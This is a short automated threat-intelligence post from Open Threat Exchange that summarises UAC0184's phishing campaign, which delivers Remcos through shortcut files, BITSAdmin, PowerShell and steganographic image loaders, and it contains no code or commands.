OTX Bot

UAC0184 Steganography Based Remcos Campaign

UAC0184 runs a multi-stage phishing campaign using fake documents and shortcut files to trick users into execution. The attack abuses legitimate Windows tools like BITSAdmin and PowerShell to download and run malicious content. It uses steganography to hide malware inside image files, which is then extracted by a loader.

Pulse ID: 6a10b4b34a90f600cf8a1fc7
Pulse Link: https://otx.alienvault.com/pulse/6a10b4b34a90f600cf8a1fc7
Pulse Author: cryptocti
Created: 2026-05-22 19:55:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #PowerShell #Remcos #Steganography #Windows #bot #cryptocti

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
May 22 at 8:04pmWeb